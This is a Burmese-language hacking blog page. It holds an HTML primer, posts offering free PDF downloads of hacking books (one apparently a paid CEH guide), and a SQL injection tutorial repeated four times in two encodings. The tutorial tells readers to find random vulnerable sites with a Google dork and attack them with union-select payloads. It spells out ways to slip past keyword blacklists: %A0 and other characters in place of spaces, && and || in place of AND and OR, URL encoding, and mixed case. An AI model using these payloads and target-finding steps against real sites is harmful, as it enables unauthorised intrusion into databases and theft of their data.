Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
Tuesday, March 26, 2019
Sunday, November 4, 2018
🤝Html အေျကာင္း🤝
(1)ဝက္ဘ္ဆိုက္ စာမ်က္ႏွာ (Web Pages)
(Web Pages) ဝက္ဘ္ဆိုက္စာမ်ာက္ႏွာ ဆိုတာ စုစည္း မွတ္ သားထားတဲ႕ စာေတြကို သတ္မွတ္ ထားတဲ႕ tages ေခၚ codes မ်ား ျဖင့္ ပုံစံခ် ေရး သား ထားေသာ စာမ်က္ႏွာ ကို internet ကြန္ရက္ ေပၚမွာ အမ်ား ဖတ္ ရႈႏွိင္ဖို႔ ေရးသား တင္ျပ ထားတဲ႕ စာမ်က္ ႏွာစု စည္း ခ်က္တစ္လု ျဖစ္ပါတယ္ ။ဒီစာမ်က္ ႏွာေတြမွာ စာေတြတင္မက ပါဘူး အပုံေတြ လႈပ္ရွားမႈပုံေတြ အသံေတြ ဗီြဒီယို ဖိုင္ေတြ အျပင္ ေနာက္ထပ္ စာမ်က္ႏွာ ေပါင္းမ်ားစြာကို သြား ဖို႔ အခ်ိတ္အဆက္ေတြ ပါႏွိင္ပါတယ္။
(2)ဝက္ဆိုက္ စာမ်က္ႏွာေတြ ကို ဘယ္လိုဖန္တီးမလဲ
ဝက္ဘ္ဆိုက္စာမ်က္ ႏွာေတြကို ဖန္းတီးလို႔ ရတဲ႕ ဘာသာစကား (language)Programming Language
အမ်ိဳးမ်ိဳး ရွိပါတယ္ ။ Html ဆိုတာကေတာ့ website စာမ်က္ႏွာ တစ္ခုရဲ႕ အေျခခံ အစိတ္အပိုင္း ေတြ ေရးသားတဲ႕ အဓိက က်တဲ႕ language တစ္ခု ပါ။ စာမ်က္ႏွာ အျကီးျကီး တစ္ခု (ဒါမွ မဟုတ္ စာမ်က္ ႏွာ တစ္ခုတည္း မွာ အထပ္ထပ္ ေပါင္းစည္း ထားတဲ႕ စာမ်က္ႏွာျကီး တစ္ခု)ကို ပုံစံ ခ်ဖို႔ အတြက္ စနစ္တက် တဲ႕ ပုံစံ ကို သတ္မွတ္ ေပးဖို႔ တျခား စာမ်က္ႏွာ ေတြကို အခ်ိတ္အဆက္ လုပ္ေပးဖို႔ HTML ဆိုတဲ႕(Hyper Text Marketup Language)ကို သုံးပါတယ္။
HTML Notepad, Notepad++, Ultra Edit Text Editor Intergrated Development Environment (IDE) Front Page, Dreamweaver Software
HTML
HTML Language 1989 CERN (Tim Berners Lee) HTML Tags HTML code() Tags HTML Tags
HTML TAGS
Html Tags Tags Tags Formatting Elements Browser (Language) Double Tag Single Tag
HTML TAGS Browser HTML TAGS Browser Browser tags tags tags Browser HTML Tag
Html Tags HTML Tags “< ” (Less than) “> ” (Greater than) “< >” tag Tag “< ” (Less than) “/” “> ” (Greater than) “</ >” tag Tag <> tag Tag </> Tag
Tag Single Tag Double Tag Single Tag Tag Tag Tag
-</br> Tag Single Tag Double Tag Tag
- <html> </html> Tag Double Tag Double Tag < tag > </tag > Single Tag <Tag > </Tag >
Tag Tag <Tag > (Case Sensitive )
HTML
<html>
<head>
<title>Page Title</title>
</head>
<body>
</body>
</html>
html Html Tags
Html
Html _
Main Structure ( )
<html>
</html>
Head ()
<head>
</head>
Body ( )
<body>
</body>
Main structure Head Body
<Html></Html> double tag <html> </html> <head></head> double tag Browser Tag Style Script <head></head> tag <body></body>tag Tag <body></body>tag
<html></html> (Html Tag)
Tag double tag pair tag ( tag ) Html Tag
<html> html Browser
</html> Tag Browser html html tag html Browser <html></html> Tag
<head> </head> (Head tag )
Browser window title bar css style tag javascript script tag tag <meta> tag head tag head tag tag
<title> </title> (Title tag)
title tag head tag tag Browser window tag Tag
<body> </body> (Body Tag)
tag body tag Tag Body Tag Tag Tag layout () tag tableless layout () tag layout tag Tag
#ေမာင္ခါး
Friday, November 2, 2018
Mastering Cross Site Scripting (XSS)
ဒီစာအုပ္ေလးဟာ Web Hacking ပိုင္းကို ေလ႔လာေနသူေတြအတြက္ အလြန္အသံုး၀င္မယ့္ စာအုပ္ေကာင္းေလးတစ္အုပ္ျဖစ္ပါတယ္။ ျမန္မာဘာသာနဲ႔ ေရးသားထားတာျဖစ္လို႔ အဂၤလိပ္စာအားနည္းတဲ႔ သူမ်ားအတြက္လည္းအဆင္ေျပေစပါတယ္။ ေကာင္းတဲ႔ ဘက္မွာ အသံုးခ်ဖို႔ေတာ့ အၾကံျပဳပါတယ္။ ကၽြန္ေတာ္ဟာ ဗုဒၶဘာသာ ျမန္မာလူမ်ိဳးတစ္ေယာက္ပါ။ ေကာင္းတာလုပ္ရင္ေကာင္းတာ ျဖစ္မယ္၊ မေကာင္းတာလုပ္မိရင္မေကာင္းတာျဖစ္မယ္ဆိုတဲ႔ ကံကံ၏ အက်ိဳးကိုယံုၾကည္လက္ခံသူတစ္ေယာက္ျဖစ္ပါတယ္။ မိတ္ေဆြမ်ားလည္း ဤစာအုပ္ေလးကို ဖတ္ရႈျပီး အသိပညာတစ္ခုတုိးသြားခဲ႔ရင္ကၽြန္ေတာ္တို႔ မွ်ေ၀ရက်ိဳးနပ္ပါျပီ။ ေကာင္းတာလုပ္ပါမိတ္ေဆြ... ေကာင္းျခင္းေတြက သင့္ဆီလာဖို႔အသင့္ျဖစ္ေနပါလိမ့္မယ္။
Downlaod PDF
Thursday, November 1, 2018
Ethical Hacking and Countermeasures version - 6
ဒီစာအုပ္ေလးဟာ System Hacking ပိုင္းကိုစတင္ေလ႔လာလိုသူမ်ားအတြက္ အထူးသင့္ေလ်ာ္တဲ႔ စာအုပ္ေကာင္းေလးတစ္အုပ္ပါ။ မိတ္ေဆြမ်ားအလြယ္တကူေလ႔လာႏုိင္ဖို႔ ေ၀မွ်ေပးလိုက္ပါတယ္ခင္ဗ်ာ.. အခမဲ႔ေဒါင္းလုဒ္ရယူႏိုင္ပါတယ္ခင္ဗ်ာ..
Hacking: Unofficial Anonymous Guide Book
ဒီစာအုပ္ေလးဟာ Hacking ပိုင္းကိုစတင္ေလ႔လာလိုသူမ်ားအတြက္ အထူးသင့္ေလ်ာ္တဲ႔ စာအုပ္ေကာင္းေလးတစ္အုပ္ပါ။ မိတ္ေဆြမ်ားအလြယ္တကူေလ႔လာႏုိင္ဖို႔ ေ၀မွ်ေပးလိုက္ပါတယ္ခင္ဗ်ာ.. ေအာက္ကလင့္ခ္ကေန အခမဲ႔ေဒါင္းလုဒ္ရယူႏိုင္ပါတယ္ခင္ဗ်ာ..
Download PDF
Saturday, October 27, 2018
CEH v10: EC-Council Certified Ethical Hacker Complete Training Guide with Practice Labs: Exam: 312-50
Amazon မွာ 28$ နဲ႔ေရာင္းခ်ေပးေနတဲ႔ CEH V10: Ethical Hacker Complete Training Guide Book ေလးကို Hacking ကိုေလ႔လာခ်င္တဲ႔ ညီကိုေမာင္ႏွမမ်ားအားလံုးအတြက္ ျပန္လည္ေ၀မွ်ေပးလုိက္ပါတယ္။ အျခားသူေတြလဲ ဖတ္ရႈႏုိင္ေအာင္ျပန္လည္ေ၀မွ်ေပးၾကဖို႔ ေမတၱာရပ္ခံအပ္ပါတယ္ခင္ဗ်ာ..
CEH vol 10 Download pdf
Monday, October 22, 2018
Black Listed in SQL Injection
[Unicode]
Black Listed in SQL Injection
SQL Injection ထိုးသူတိုင်းကြုံ့ဖူးတယ်ထင်ပါတယ်
အရင်ဆုံးထိုးမယ်ဆိုအရင်းဆုံး Dork လေးနဲ့လိုက်ရှာပါတယ် ကျွန်တော်ဆိုရင်ပြောပါတယ်
ဥပမာ google ကနေ inurl:index.php?id= (dork) သုံးပြီးပေါ့
ပြီးရင် ပေါက်တဲ့ဆိုက်ကို random ရွေးတယ်ပေါ့
ဥပမာ example.com/index.php?id=1 ပဲထားပါတော့ ပြီးရင် ' လေးထည့်ကြည့်တယ်ပေါ့
အကယ်လို့ပေါက်ခဲ့ရင်
'You have an error in your SQL syntax...' ဘာညာတိတော့ပု biggrin
အဲ့ query ကို break လုပ်ပြီးသွားရင် ပြန်ကလိပေါ့ --+ တို့ # နဲ့လဲအစဉ်ပြေတတ်ပါတယ် biggrin
နောက် ../id=1' order by 1 ပြီး တူး, တရီးအဲ့လို့နဲ့ error တက်တဲ့အထိစမ်းတာပေါ့
ပြောရရင် 5 မှာ unknown coloumn တက်ရင် 4 အထိရှိတယ်ပေါ့
ပြီးရင် union all select သုံးကြတယ်ပေါ့
../id=-1 union all select 1,2,3 --+ (အဲ့မှာ id= လေးက 1 မှာ negative value အပြင် no. အကြီးကြီးတွေထည့်လဲရပါတယ် like 999999)
နောက် database() တို့ version() or @@version တို့နဲ့ ဘာညာပေါ့
ထားပါတော့
အခုပြောချင်တာက ကျွန်တော်တို့ url ကနေထိုးကြတဲ့အခါတခါတလေကျရင် Space , Comment , Union , Select , AND , OR တို့က black listed ထားတာဖြစ်တတ်ပါတယ်
ဒီတော့ဘာဖြစ်သလဲဆိုတော့ URL မှာရေးရင်အလုပ်မလုပ်တော့ဘူးပေါ့
အဲ့ပြသနာကဒီလိုဗျ ပြောရရင် vulnerability ဖြစ်တယ်ဆို order by ကိုအသုံးတာသိမှာပါ
ဒီတော့ OR က black listed ခံထားရတော့ order by 1 ဆို der by 1 ဖြစ်ကုန်ရော
ဘာမှန်းကိုမသိတော့တာ အဲ့တော့ omg
ဒီလိုပဲ space black listed ခံထားရရင်လဲအတူတူပါပဲ
union all select 1,2,3 ဆိုရင် unionallselect1,2,3 ဖြစ်ကုန်ရော
တူတူပါပဲ အလုပ်မလုပ်တော့ပါဘူး
ဒီတော့ space ကိုဖြေရှင်းနည်းပြောချင်ပါတယ်
ဒီလိုလေးရေးပေါ့
space နေရာမှာ random character တွေထည့်ပြီးရေးလို့ရပါတယ်
ပြောရရင်
.../id=1'%A0union%A0all%A0select%A01,2,3...
space နေရာမှာ random character ကိုနေရာယူပြီးရေးလိုက်ခြင်းသာဖြစ်ပါတယ်
ကြည့်ရတာတော့ခေါင်းမူးတာပေါ့ blink
%A0 ပဲရှိတာမပာုတ်ပါဘူး ဒီကောင်တွေလဲရပါသေးတယ် %09 , %0A , %0C , %0D , %0B roflmao
ဒီလိုရေးလဲရပါသေးတယ် ... နောက်တစ်နည်းပေါ့
union(select(1),(2),(3)); အဲ့သလိုဆိုလဲအလုပ်လုပ်မှာဖြစ်ပါတယ်......
ဒါဆိုနောက်တစ်ခုဆက်ပါတယ် OR , AND ကို black listed ထားရင်ပေါ့
.../id=1' order by 1 --+ လို့ရေးရင် OR ကို filter လုပ်လိုက်တော့ der by 1 ဖြစ်ကော အဲ့တော့ဘာပြောလို့ပြောမှန်းကိုမသိ omg omg
AND ကိုအသုံးပြုလဲထိုအတိုင်းဖြစ်ကောပေါ့
blink blink blink blink ဒီတော့ solution က ????? blink blink blink blink
|| ဒါမှမပာုတ် && နဲ့စမ်းလို့ရပါတယ်
ဒီလိုလေးပါ id=1' AND 1 --+ , id=1' OR 1 --+ တို့အစား id=1' && 1 --+ , id=1' || 1 --+ ပေါ့
နောက်တစ်ခုက encode လုပ်ပြီးရေးရင်လဲရပါတယ်
အဲ့အတွက် ဒီဆိုက်လေးကိုသွားလိုက်ပါ (http://www.url-encode-decode.com/)
အဲ့ရောက်ရင် encode ကိုရွေး && ဆိုရင် %26%26 ပါ || ဆိုရင် %7C%7C ပေါ့
So How About Union & Select is black listed??
blink blink unsure unsure
../id=1 union select 1,2,3%26%26 '1 ဒါကပုံမှန်ပေါ့ enter ခေါက်လိုက်ရင် အလုပ်မလုပ်ဖူးဗျ union နဲ့ select ကကျန်ခဲ့ရောဒီတော့
အာ့ဆိုဒီလိုစမ်းမယ်ဗျာ
../id=1%A0union%A0select%A01,2,3%26%26%271 ဒါလဲမလုပ်ဖူးဗျ အာ့ဆို.... blink
ဒီလိုလေးဖြေရှင်းလို့ရပါတယ် ../id=1%A0uNiOn%A0sElEct%A01,2,3%26%26%271 victorie
ဒီလောက်ဆို Black Listed ကိုဘယ်လိုရှောင်တိန်းလို့ရတယ်ဆိုတာသိလောက်ပြီထင်ပါတယ်
ကျွန်တော်ကိုယ်တိုင်လည်း begginer တစ်ယောက်ပါပဲ
နောက် ကျွန်တော့်လိုတခြား begginer တွေအနေနဲ့လဲ tools တွေကိုအားမကိုးသင့်ပါဖူး like Havij
ဘာလို့လဲဆိုတော့ concept ကိုနားမလည်ကြတော့လို့ပါ
manual ထိုးကြည့်ပါပာုတ်ပါတယ်ခက်တာတော့ခက်တာပေါ့အစဆိုတော့ (ကျွန်တော်အပါအဝင်ပါပဲ)
ရေးသားရာမှာအမှားပါတယ်.... နားမလည်တာဆို ကျွန်တော်ညံဖြင်းလို့သာဖြစ်ပါတယ်
thanks for reading
Cyko Rat
[Zawgyi]Black Listed in SQL Injection
Black Listed in SQL Injection
SQL Injection ထိုးသူတိုင္းၾကံဳ ့ဖူးတယ္ထင္ပါတယ္
အရင္ဆံုးထိုးမယ္ဆိုအရင္းဆံုး Dork ေလးနဲ ့လိုက္ရွာပါတယ္ ကြ်န္ေတာ္ဆိုရင္ေျပာပါတယ္
ဥပမာ google ကေန inurl:index.php?id= (dork) သံုးျပီးေပါ့
ျပီးရင္ ေပါက္တဲ့ဆိုက္ကို random ေရြးတယ္ေပါ့
ဥပမာ example.com/index.php?id=1 ပဲထားပါေတာ့ ျပီးရင္ ' ေလးထည့္ၾကည့္တယ္ေပါ့
အကယ္လို ့ေပါက္ခဲ့ရင္
'You have an error in your SQL syntax...' ဘာညာတိေတာ့ပု biggrin
အဲ့ query ကို break လုပ္ျပီးသြားရင္ ျပန္ကလိေပါ့ --+ တို ့ # နဲ ့လဲအစဥ္ေျပတတ္ပါတယ္ biggrin
ေနာက္ ../id=1' order by 1 ျပီး တူး, တရီးအဲ့လို ့နဲ ့ error တက္တဲ့အထိစမ္းတာေပါ့
ေျပာရရင္ 5 မွာ unknown coloumn တက္ရင္ 4 အထိရွိတယ္ေပါ့
ျပီးရင္ union all select သံုးၾကတယ္ေပါ့
../id=-1 union all select 1,2,3 --+ (အဲ့မွာ id= ေလးက 1 မွာ negative value အျပင္ no. အၾကီးၾကီးေတြထည့္လဲရပါတယ္ like 999999)
ေနာက္ database() တို ့ version() or @@version တို ့နဲ ့ ဘာညာေပါ့
ထားပါေတာ့
အခုေျပာခ်င္တာက ကြ်န္ေတာ္တို ့ url ကေနထိုးၾကတဲ့အခါတခါတေလက်ရင္ Space , Comment , Union , Select , AND , OR တို ့က black listed ထားတာျဖစ္တတ္ပါတယ္
ဒီေတာ့ဘာျဖစ္သလဲဆိုေတာ့ URL မွာေရးရင္အလုပ္မလုပ္ေတာ့ဘူးေပါ့
အဲ့ျပသနာကဒီလိုဗ် ေျပာရရင္ vulnerability ျဖစ္တယ္ဆို order by ကိုအသံုးတာသိမွာပါ
ဒီေတာ့ OR က black listed ခံထားရေတာ့ order by 1 ဆို der by 1 ျဖစ္ကုန္ေရာ
ဘာမွန္းကိုမသိေတာ့တာ အဲ့ေတာ့ omg
ဒီလိုပဲ space black listed ခံထားရရင္လဲအတူတူပါပဲ
union all select 1,2,3 ဆိုရင္ unionallselect1,2,3 ျဖစ္ကုန္ေရာ
တူတူပါပဲ အလုပ္မလုပ္ေတာ့ပါဘူး
ဒီေတာ့ space ကိုေျဖရွင္းနည္းေျပာခ်င္ပါတယ္
ဒီလိုေလးေရးေပါ့
space ေနရာမွာ random character ေတြထည့္ျပီးေရးလို ့ရပါတယ္
ေျပာရရင္
.../id=1'%A0union%A0all%A0select%A01,2,3...
space ေနရာမွာ random character ကိုေနရာယူျပီးေရးလိုက္ျခင္းသာျဖစ္ပါတယ္
ၾကည့္ရတာေတာ့ေခါင္းမူးတာေပါ့ blink
%A0 ပဲရွိတာမပာုတ္ပါဘူး ဒီေကာင္ေတြလဲရပါေသးတယ္ %09 , %0A , %0C , %0D , %0B roflmao
ဒီလိုေရးလဲရပါေသးတယ္ ... ေနာက္တစ္နည္းေပါ့
union(select(1),(2),(3)); အဲ့သလိုဆိုလဲအလုပ္လုပ္မွာျဖစ္ပါတယ္......
ဒါဆိုေနာက္တစ္ခုဆက္ပါတယ္ OR , AND ကို black listed ထားရင္ေပါ့
.../id=1' order by 1 --+ လို ့ေရးရင္ OR ကို filter လုပ္လိုက္ေတာ့ der by 1 ျဖစ္ေကာ အဲ့ေတာ့ဘာေျပာလို ့ေျပာမွန္းကိုမသိ omg omg
AND ကိုအသံုးျပဳလဲထုိအတိုင္းျဖစ္ေကာေပါ့
blink blink blink blink ဒီေတာ့ solution က ????? blink blink blink blink
|| ဒါမွမပာုတ္ && နဲ ့စမ္းလို ့ရပါတယ္
ဒီလိုေလးပါ id=1' AND 1 --+ , id=1' OR 1 --+ တို ့အစား id=1' && 1 --+ , id=1' || 1 --+ ေပါ့
ေနာက္တစ္ခုက encode လုပ္ျပီးေရးရင္လဲရပါတယ္
အဲ့အတြက္ ဒီဆိုက္ေလးကိုသြားလိုက္ပါ (http://www.url-encode-decode.com/)
အဲ့ေရာက္ရင္ encode ကိုေရြး && ဆိုရင္ %26%26 ပါ || ဆိုရင္ %7C%7C ေပါ့
So How About Union & Select is black listed??
blink blink unsure unsure
../id=1 union select 1,2,3%26%26 '1 ဒါကပံုမွန္ေပါ့ enter ေခါက္လိုက္ရင္ အလုပ္မလုပ္ဖူးဗ် union နဲ ့ select ကက်န္ခဲ့ေရာဒီေတာ့
အာ့ဆိုဒီလိုစမ္းမယ္ဗ်ာ
../id=1%A0union%A0select%A01,2,3%26%26%271 ဒါလဲမလုပ္ဖူးဗ် အာ့ဆို.... blink
ဒီလိုေလးေျဖရွင္းလို ့ရပါတယ္ ../id=1%A0uNiOn%A0sElEct%A01,2,3%26%26%271 victorie
ဒီေလာက္ဆို Black Listed ကိုဘယ္လိုေရွာင္တိန္းလို ့ရတယ္ဆိုတာသိေလာက္ျပီထင္ပါတယ္
ကြ်န္ေတာ္ကိုယ္တိုင္လည္း begginer တစ္ေယာက္ပါပဲ
ေနာက္ ကြ်န္ေတာ့္လိုတျခား begginer ေတြအေနနဲ ့လဲ tools ေတြကိုအားမကိုးသင့္ပါဖူး like Havij
ဘာလို ့လဲဆိုေတာ့ concept ကိုနားမလည္ၾကေတာ့လို ့ပါ
manual ထိုးၾကည့္ပါပာုတ္ပါတယ္ခက္တာေတာ့ခက္တာေပါ့အစဆိုေတာ့ (ကြ်န္ေတာ္အပါအ၀င္ပါပဲ)
ေရးသားရာမွာအမွားပါတယ္.... နားမလည္တာဆို ကြ်န္ေတာ္ညံျဖင္းလို ့သာျဖစ္ပါတယ္
Cyko Rat
Black Listed in SQL Injection
SQL Injection ထိုးသူတိုင်းကြုံ့ဖူးတယ်ထင်ပါတယ်
အရင်ဆုံးထိုးမယ်ဆိုအရင်းဆုံး Dork လေးနဲ့လိုက်ရှာပါတယ် ကျွန်တော်ဆိုရင်ပြောပါတယ်
ဥပမာ google ကနေ inurl:index.php?id= (dork) သုံးပြီးပေါ့
ပြီးရင် ပေါက်တဲ့ဆိုက်ကို random ရွေးတယ်ပေါ့
ဥပမာ example.com/index.php?id=1 ပဲထားပါတော့ ပြီးရင် ' လေးထည့်ကြည့်တယ်ပေါ့
အကယ်လို့ပေါက်ခဲ့ရင်
'You have an error in your SQL syntax...' ဘာညာတိတော့ပု biggrin
အဲ့ query ကို break လုပ်ပြီးသွားရင် ပြန်ကလိပေါ့ --+ တို့ # နဲ့လဲအစဉ်ပြေတတ်ပါတယ် biggrin
နောက် ../id=1' order by 1 ပြီး တူး, တရီးအဲ့လို့နဲ့ error တက်တဲ့အထိစမ်းတာပေါ့
ပြောရရင် 5 မှာ unknown coloumn တက်ရင် 4 အထိရှိတယ်ပေါ့
ပြီးရင် union all select သုံးကြတယ်ပေါ့
../id=-1 union all select 1,2,3 --+ (အဲ့မှာ id= လေးက 1 မှာ negative value အပြင် no. အကြီးကြီးတွေထည့်လဲရပါတယ် like 999999)
နောက် database() တို့ version() or @@version တို့နဲ့ ဘာညာပေါ့
ထားပါတော့
အခုပြောချင်တာက ကျွန်တော်တို့ url ကနေထိုးကြတဲ့အခါတခါတလေကျရင် Space , Comment , Union , Select , AND , OR တို့က black listed ထားတာဖြစ်တတ်ပါတယ်
ဒီတော့ဘာဖြစ်သလဲဆိုတော့ URL မှာရေးရင်အလုပ်မလုပ်တော့ဘူးပေါ့
အဲ့ပြသနာကဒီလိုဗျ ပြောရရင် vulnerability ဖြစ်တယ်ဆို order by ကိုအသုံးတာသိမှာပါ
ဒီတော့ OR က black listed ခံထားရတော့ order by 1 ဆို der by 1 ဖြစ်ကုန်ရော
ဘာမှန်းကိုမသိတော့တာ အဲ့တော့ omg
ဒီလိုပဲ space black listed ခံထားရရင်လဲအတူတူပါပဲ
union all select 1,2,3 ဆိုရင် unionallselect1,2,3 ဖြစ်ကုန်ရော
တူတူပါပဲ အလုပ်မလုပ်တော့ပါဘူး
ဒီတော့ space ကိုဖြေရှင်းနည်းပြောချင်ပါတယ်
ဒီလိုလေးရေးပေါ့
space နေရာမှာ random character တွေထည့်ပြီးရေးလို့ရပါတယ်
ပြောရရင်
.../id=1'%A0union%A0all%A0select%A01,2,3...
space နေရာမှာ random character ကိုနေရာယူပြီးရေးလိုက်ခြင်းသာဖြစ်ပါတယ်
ကြည့်ရတာတော့ခေါင်းမူးတာပေါ့ blink
%A0 ပဲရှိတာမပာုတ်ပါဘူး ဒီကောင်တွေလဲရပါသေးတယ် %09 , %0A , %0C , %0D , %0B roflmao
ဒီလိုရေးလဲရပါသေးတယ် ... နောက်တစ်နည်းပေါ့
union(select(1),(2),(3)); အဲ့သလိုဆိုလဲအလုပ်လုပ်မှာဖြစ်ပါတယ်......
ဒါဆိုနောက်တစ်ခုဆက်ပါတယ် OR , AND ကို black listed ထားရင်ပေါ့
.../id=1' order by 1 --+ လို့ရေးရင် OR ကို filter လုပ်လိုက်တော့ der by 1 ဖြစ်ကော အဲ့တော့ဘာပြောလို့ပြောမှန်းကိုမသိ omg omg
AND ကိုအသုံးပြုလဲထိုအတိုင်းဖြစ်ကောပေါ့
blink blink blink blink ဒီတော့ solution က ????? blink blink blink blink
|| ဒါမှမပာုတ် && နဲ့စမ်းလို့ရပါတယ်
ဒီလိုလေးပါ id=1' AND 1 --+ , id=1' OR 1 --+ တို့အစား id=1' && 1 --+ , id=1' || 1 --+ ပေါ့
နောက်တစ်ခုက encode လုပ်ပြီးရေးရင်လဲရပါတယ်
အဲ့အတွက် ဒီဆိုက်လေးကိုသွားလိုက်ပါ (http://www.url-encode-decode.com/)
အဲ့ရောက်ရင် encode ကိုရွေး && ဆိုရင် %26%26 ပါ || ဆိုရင် %7C%7C ပေါ့
So How About Union & Select is black listed??
blink blink unsure unsure
../id=1 union select 1,2,3%26%26 '1 ဒါကပုံမှန်ပေါ့ enter ခေါက်လိုက်ရင် အလုပ်မလုပ်ဖူးဗျ union နဲ့ select ကကျန်ခဲ့ရောဒီတော့
အာ့ဆိုဒီလိုစမ်းမယ်ဗျာ
../id=1%A0union%A0select%A01,2,3%26%26%271 ဒါလဲမလုပ်ဖူးဗျ အာ့ဆို.... blink
ဒီလိုလေးဖြေရှင်းလို့ရပါတယ် ../id=1%A0uNiOn%A0sElEct%A01,2,3%26%26%271 victorie
ဒီလောက်ဆို Black Listed ကိုဘယ်လိုရှောင်တိန်းလို့ရတယ်ဆိုတာသိလောက်ပြီထင်ပါတယ်
ကျွန်တော်ကိုယ်တိုင်လည်း begginer တစ်ယောက်ပါပဲ
နောက် ကျွန်တော့်လိုတခြား begginer တွေအနေနဲ့လဲ tools တွေကိုအားမကိုးသင့်ပါဖူး like Havij
ဘာလို့လဲဆိုတော့ concept ကိုနားမလည်ကြတော့လို့ပါ
manual ထိုးကြည့်ပါပာုတ်ပါတယ်ခက်တာတော့ခက်တာပေါ့အစဆိုတော့ (ကျွန်တော်အပါအဝင်ပါပဲ)
ရေးသားရာမှာအမှားပါတယ်.... နားမလည်တာဆို ကျွန်တော်ညံဖြင်းလို့သာဖြစ်ပါတယ်
thanks for reading
Cyko Rat
[Zawgyi]Black Listed in SQL Injection
Black Listed in SQL Injection
SQL Injection ထိုးသူတိုင္းၾကံဳ ့ဖူးတယ္ထင္ပါတယ္
အရင္ဆံုးထိုးမယ္ဆိုအရင္းဆံုး Dork ေလးနဲ ့လိုက္ရွာပါတယ္ ကြ်န္ေတာ္ဆိုရင္ေျပာပါတယ္
ဥပမာ google ကေန inurl:index.php?id= (dork) သံုးျပီးေပါ့
ျပီးရင္ ေပါက္တဲ့ဆိုက္ကို random ေရြးတယ္ေပါ့
ဥပမာ example.com/index.php?id=1 ပဲထားပါေတာ့ ျပီးရင္ ' ေလးထည့္ၾကည့္တယ္ေပါ့
အကယ္လို ့ေပါက္ခဲ့ရင္
'You have an error in your SQL syntax...' ဘာညာတိေတာ့ပု biggrin
အဲ့ query ကို break လုပ္ျပီးသြားရင္ ျပန္ကလိေပါ့ --+ တို ့ # နဲ ့လဲအစဥ္ေျပတတ္ပါတယ္ biggrin
ေနာက္ ../id=1' order by 1 ျပီး တူး, တရီးအဲ့လို ့နဲ ့ error တက္တဲ့အထိစမ္းတာေပါ့
ေျပာရရင္ 5 မွာ unknown coloumn တက္ရင္ 4 အထိရွိတယ္ေပါ့
ျပီးရင္ union all select သံုးၾကတယ္ေပါ့
../id=-1 union all select 1,2,3 --+ (အဲ့မွာ id= ေလးက 1 မွာ negative value အျပင္ no. အၾကီးၾကီးေတြထည့္လဲရပါတယ္ like 999999)
ေနာက္ database() တို ့ version() or @@version တို ့နဲ ့ ဘာညာေပါ့
ထားပါေတာ့
အခုေျပာခ်င္တာက ကြ်န္ေတာ္တို ့ url ကေနထိုးၾကတဲ့အခါတခါတေလက်ရင္ Space , Comment , Union , Select , AND , OR တို ့က black listed ထားတာျဖစ္တတ္ပါတယ္
ဒီေတာ့ဘာျဖစ္သလဲဆိုေတာ့ URL မွာေရးရင္အလုပ္မလုပ္ေတာ့ဘူးေပါ့
အဲ့ျပသနာကဒီလိုဗ် ေျပာရရင္ vulnerability ျဖစ္တယ္ဆို order by ကိုအသံုးတာသိမွာပါ
ဒီေတာ့ OR က black listed ခံထားရေတာ့ order by 1 ဆို der by 1 ျဖစ္ကုန္ေရာ
ဘာမွန္းကိုမသိေတာ့တာ အဲ့ေတာ့ omg
ဒီလိုပဲ space black listed ခံထားရရင္လဲအတူတူပါပဲ
union all select 1,2,3 ဆိုရင္ unionallselect1,2,3 ျဖစ္ကုန္ေရာ
တူတူပါပဲ အလုပ္မလုပ္ေတာ့ပါဘူး
ဒီေတာ့ space ကိုေျဖရွင္းနည္းေျပာခ်င္ပါတယ္
ဒီလိုေလးေရးေပါ့
space ေနရာမွာ random character ေတြထည့္ျပီးေရးလို ့ရပါတယ္
ေျပာရရင္
.../id=1'%A0union%A0all%A0select%A01,2,3...
space ေနရာမွာ random character ကိုေနရာယူျပီးေရးလိုက္ျခင္းသာျဖစ္ပါတယ္
ၾကည့္ရတာေတာ့ေခါင္းမူးတာေပါ့ blink
%A0 ပဲရွိတာမပာုတ္ပါဘူး ဒီေကာင္ေတြလဲရပါေသးတယ္ %09 , %0A , %0C , %0D , %0B roflmao
ဒီလိုေရးလဲရပါေသးတယ္ ... ေနာက္တစ္နည္းေပါ့
union(select(1),(2),(3)); အဲ့သလိုဆိုလဲအလုပ္လုပ္မွာျဖစ္ပါတယ္......
ဒါဆိုေနာက္တစ္ခုဆက္ပါတယ္ OR , AND ကို black listed ထားရင္ေပါ့
.../id=1' order by 1 --+ လို ့ေရးရင္ OR ကို filter လုပ္လိုက္ေတာ့ der by 1 ျဖစ္ေကာ အဲ့ေတာ့ဘာေျပာလို ့ေျပာမွန္းကိုမသိ omg omg
AND ကိုအသံုးျပဳလဲထုိအတိုင္းျဖစ္ေကာေပါ့
blink blink blink blink ဒီေတာ့ solution က ????? blink blink blink blink
|| ဒါမွမပာုတ္ && နဲ ့စမ္းလို ့ရပါတယ္
ဒီလိုေလးပါ id=1' AND 1 --+ , id=1' OR 1 --+ တို ့အစား id=1' && 1 --+ , id=1' || 1 --+ ေပါ့
ေနာက္တစ္ခုက encode လုပ္ျပီးေရးရင္လဲရပါတယ္
အဲ့အတြက္ ဒီဆိုက္ေလးကိုသြားလိုက္ပါ (http://www.url-encode-decode.com/)
အဲ့ေရာက္ရင္ encode ကိုေရြး && ဆိုရင္ %26%26 ပါ || ဆိုရင္ %7C%7C ေပါ့
So How About Union & Select is black listed??
blink blink unsure unsure
../id=1 union select 1,2,3%26%26 '1 ဒါကပံုမွန္ေပါ့ enter ေခါက္လိုက္ရင္ အလုပ္မလုပ္ဖူးဗ် union နဲ ့ select ကက်န္ခဲ့ေရာဒီေတာ့
အာ့ဆိုဒီလိုစမ္းမယ္ဗ်ာ
../id=1%A0union%A0select%A01,2,3%26%26%271 ဒါလဲမလုပ္ဖူးဗ် အာ့ဆို.... blink
ဒီလိုေလးေျဖရွင္းလို ့ရပါတယ္ ../id=1%A0uNiOn%A0sElEct%A01,2,3%26%26%271 victorie
ဒီေလာက္ဆို Black Listed ကိုဘယ္လိုေရွာင္တိန္းလို ့ရတယ္ဆိုတာသိေလာက္ျပီထင္ပါတယ္
ကြ်န္ေတာ္ကိုယ္တိုင္လည္း begginer တစ္ေယာက္ပါပဲ
ေနာက္ ကြ်န္ေတာ့္လိုတျခား begginer ေတြအေနနဲ ့လဲ tools ေတြကိုအားမကိုးသင့္ပါဖူး like Havij
ဘာလို ့လဲဆိုေတာ့ concept ကိုနားမလည္ၾကေတာ့လို ့ပါ
manual ထိုးၾကည့္ပါပာုတ္ပါတယ္ခက္တာေတာ့ခက္တာေပါ့အစဆိုေတာ့ (ကြ်န္ေတာ္အပါအ၀င္ပါပဲ)
